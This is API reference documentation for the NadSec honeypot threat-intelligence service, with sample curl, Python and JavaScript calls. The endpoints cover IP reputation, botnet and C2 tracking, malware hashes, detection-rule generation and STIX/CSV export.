REST API with 38+ documented endpoints for querying NadSec honeypot threat intelligence. No authentication required.
https://api.nadsec.onlineNo API key required. Public access.
100 requests/minute per IP
Global search and IP threat correlation
Multi-category global search across IPs, botnets, C2 servers, commands, countries, orgs, ports, and malware hashes. Supports IP prefix/subnet matching.
q(string)requiredSearch query - IP, hash, botnet name, command, country, org, or port numberhours(integer)Time window in hours (default: 168, max: 720)limit(integer)Max results per category (default: 20, max: 200)curl "https://api.nadsec.online/api/search?q=mirai&hours=168&limit=10"
Full IP correlation: related botnets, C2 infrastructure, malware, commands, and activity timeline.
ip(string)requiredIPv4 addresshours(integer)Time window in hours (default: 168, max: 720)curl "https://api.nadsec.online/api/correlate/ip/185.220.101.1?hours=720"
Threat intelligence for specific IPs and top threats
Get comprehensive threat data for a specific IP including threat score, honeypots triggered, ports targeted, and daily activity.
ip(string)requiredIPv4 addresshours(integer)Time window in hours (default: 720)curl "https://api.nadsec.online/api/ip/185.220.101.1?hours=720"
Full IP reputation scoring with weighted components: frequency, persistence, diversity, spread, and recency.
ip(string)requiredIPv4 addresshours(integer)Time window in hours (default: 720, max: 2160)curl "https://api.nadsec.online/api/ip/185.220.101.1/reputation?hours=720"
Top threat IPs ranked by activity volume, with geo/org/port metadata.
hours(integer)Time window in hours (default: 24, max: 720)limit(integer)Max results (default: 20, max: 1000)curl "https://api.nadsec.online/api/ip/top-threats?hours=168&limit=20"
Bulk IP lookup - up to 100 IPs per request. Returns threat data for each IP.
ips(string[])requiredArray of IPv4 addresses (max 100)hours(integer)Time window in hours (default: 720)curl -X POST "https://api.nadsec.online/api/ip/bulk" -H "Content-Type: application/json" -d '{"ips": ["1.2.3.4", "5.6.7.8"]}'Bulk IP reputation scoring - up to 100 IPs per request. Returns reputation scores with weighted components.
ips(string[])requiredArray of IPv4 addresses (max 100)hours(integer)Time window in hours (default: 720)curl -X POST "https://api.nadsec.online/api/ip/reputation/bulk" -H "Content-Type: application/json" -d '{"ips": ["1.2.3.4", "5.6.7.8"]}'Campaign clustering and automated detection rule generation
Indicator-first campaign clustering - discovers related IPs through shared infrastructure (subnets, C2, botnets, commands), then merges via union-find. Guarantees monotonicity.
hours(integer)Time window in hours (default: 168, max: 720)min_ips(integer)Minimum IPs to form a campaign (default: 3, min: 1)limit(integer)Max campaigns (default: 20, max: 100)curl "https://api.nadsec.online/api/intel/campaigns?hours=168&min_ips=2"
Auto-generate Snort, Sigma, YARA, and Suricata rules from live honeypot data. SID range: 9900000-9999999.
rule_type(string)ip_blocklist, c2_detection, malware_detection, credential_bruteforce, or all (default: all)format(string)snort, sigma, yara, suricata, or all (default: all)hours(integer)Time window in hours (default: 168, max: 720)min_hits(integer)Minimum hits to include (default: 5, max: 1000)limit(integer)Max rules per type (default: 50, max: 500)curl "https://api.nadsec.online/api/intel/rules?rule_type=c2_detection&format=snort&hours=168"
Track emerging threats and activity spikes vs baseline
Compare recent activity against a historical baseline to surface NEW IPs and SPIKING threats.
hours(integer)Recent window to analyze (default: 24, max: 720)baseline_hours(integer)Baseline window for comparison (default: 168, max: 720)curl "https://api.nadsec.online/api/trending?hours=24&baseline_hours=168"
Real-time attack events for map visualization. Returns geo-located events with type/country/port breakdowns.
minutes(integer)Time window in minutes (default: 5, max: 60)limit(integer)Max events (default: 200, max: 500)country(string)Filter by country nametype(string)Filter by honeypot typeport(integer)Filter by destination portcurl "https://api.nadsec.online/api/live-attacks?minutes=5&limit=100"
Aggregate attack statistics and breakdowns
Aggregate stats: total attacks, unique IPs, breakdowns by type, country, port, org.
hours(integer)Time window in hours (default: 24, max: 720)curl "https://api.nadsec.online/api/stats/summary?hours=168"
Today's stats (Sydney timezone) with hourly breakdown.
curl "https://api.nadsec.online/api/stats/today"
Rolling window stats for specified minutes.
minutes(integer)Window in minutes (default: 60, max: 1440)country(string)Filter by countrytype(string)Filter by honeypot typecurl "https://api.nadsec.online/api/stats/rolling?minutes=60"
Last 24 hours stats with hourly timeline.
curl "https://api.nadsec.online/api/stats/rolling24h"
MITRE ATT&CK technique/tactic statistics mapped from honeypot and port data.
hours(integer)Time window in hours (default: 24, max: 720)curl "https://api.nadsec.online/api/stats/mitre?hours=168"
C2 servers, botnets, malware, and credential data - all dynamically extracted from honeypot events
Dynamically extracted C2 server IPs from wget/curl/http commands in honeypot sessions. Zero hardcoded IPs.
hours(integer)Time window in hours (default: 720, max: 2160)curl "https://api.nadsec.online/api/threat-intel/c2?hours=168"
3-tier botnet detection: signature keywords (high), behavioral patterns (medium), auto-extracted binaries (low), plus dynamic C2 IP correlation.
hours(integer)Time window in hours (default: 720, max: 2160)curl "https://api.nadsec.online/api/threat-intel/botnets?hours=168"
Unique SHA256 hashes of malware samples captured by honeypots.
hours(integer)Time window in hours (default: 720, max: 2160)limit(integer)Max results (default: 50, max: 200)curl "https://api.nadsec.online/api/threat-intel/malware-hashes?hours=168&limit=50"
Malware download URLs extracted from attack commands.
hours(integer)Time window in hours (default: 720, max: 2160)limit(integer)Max results (default: 50, max: 500)curl "https://api.nadsec.online/api/threat-intel/malware-urls?hours=168"
IPs that have dropped malware samples (have SHA256 hashes in logs).
hours(integer)Time window in hours (default: 720, max: 2160)limit(integer)Max results (default: 50, max: 500)curl "https://api.nadsec.online/api/threat-intel/malware-droppers?hours=168"
Alternative malware hash endpoint - returns SHA256 hashes of captured samples with hit counts and first/last seen timestamps.
hours(integer)Time window in hours (default: 720, max: 2160)limit(integer)Max results (default: 50, max: 200)curl "https://api.nadsec.online/api/malware/hashes?hours=168"
Top username/password combinations from brute-force attempts on SSH/Telnet honeypots.
hours(integer)Time window in hours (default: 168, max: 720)limit(integer)Max results (default: 20, max: 500)curl "https://api.nadsec.online/api/credentials/top?hours=168"
Top commands executed by attackers, with botnet detection and download/persistence flags.
hours(integer)Time window in hours (default: 168, max: 720)limit(integer)Max results (default: 30, max: 500)curl "https://api.nadsec.online/api/commands/top?hours=168&limit=20"
Ports, protocols, countries, organizations, honeypot types, Suricata IDS, and MITRE mappings
Top targeted ports with MITRE ATT&CK technique mappings.
hours(integer)Time window in hours (default: 24, max: 720)limit(integer)Max results (default: 20, max: 500)curl "https://api.nadsec.online/api/ports/top?hours=168"
Protocol breakdown from network analysis.
hours(integer)Time window in hours (default: 168, max: 720)curl "https://api.nadsec.online/api/protocols?hours=168"
Attack source countries ranked by event count.
hours(integer)Time window in hours (default: 24, max: 720)curl "https://api.nadsec.online/api/countries?hours=168"
Top attacking organizations/ISPs, optionally filtered by country.
hours(integer)Time window in hours (default: 24, max: 720)country(string)Filter by country namecurl "https://api.nadsec.online/api/orgs?hours=168&country=China"
List all honeypot types with display colors.
curl "https://api.nadsec.online/api/types"
Top Suricata IDS alert signatures with categories and severity.
hours(integer)Time window in hours (default: 168, max: 720)limit(integer)Max results (default: 50, max: 200)curl "https://api.nadsec.online/api/suricata/signatures?hours=168"
Full MITRE ATT&CK technique listing with honeypot and port mappings.
curl "https://api.nadsec.online/api/mitre/techniques"
Raw attack event data
Latest attack events with full geo and honeypot metadata.
limit(integer)Max events (default: 100, max: 500)country(string)Filter by countrytype(string)Filter by honeypot typeport(integer)Filter by portcurl "https://api.nadsec.online/api/attacks/latest?limit=50&type=ssh"
Total attack count for a time window with optional filters.
hours(integer)Time window in hours (default: 24, max: 720)country(string)Filter by countrytype(string)Filter by honeypot typeport(integer)Filter by portcurl "https://api.nadsec.online/api/attacks/count?hours=24"
Export threat intel in STIX 2.1 and CSV formats for SIEM, firewall, and threat intel platform integration
Export IOCs in STIX 2.1 bundle format. Compatible with TAXII servers, OpenCTI, MISP.
hours(integer)Time window in hours (default: 24, max: 720)ioc_type(string)IOC type: ip, hash, url, or all (default: ip)limit(integer)Max IOCs (default: 100, max: 5000)curl "https://api.nadsec.online/api/export/stix?hours=24&ioc_type=all&limit=500"
Export IOCs as CSV for firewall rules, SIEM ingestion, or spreadsheet analysis.
hours(integer)Time window in hours (default: 24, max: 720)ioc_type(string)IOC type: ip, hash, url, or c2 (default: ip)limit(integer)Max IOCs (default: 500, max: 5000)curl "https://api.nadsec.online/api/export/csv?hours=24&ioc_type=ip&limit=500" -o threat-ips.csv
import requests
# Get top threats
resp = requests.get(
"https://api.nadsec.online/api/ip/top-threats",
params={"hours": 24, "limit": 10}
)
data = resp.json()
for threat in data["threats"]:
print(f"{threat['ip']}: {threat['events']} events - score {threat['threat_score_estimate']}")// Search for Mirai botnets
const resp = await fetch(
"https://api.nadsec.online/api/search?q=mirai&hours=168&limit=10"
);
const data = await resp.json();
data.results.botnets.items.forEach(b => {
console.log(`${b.name}: ${b.hits} hits [${b.type}]`);
});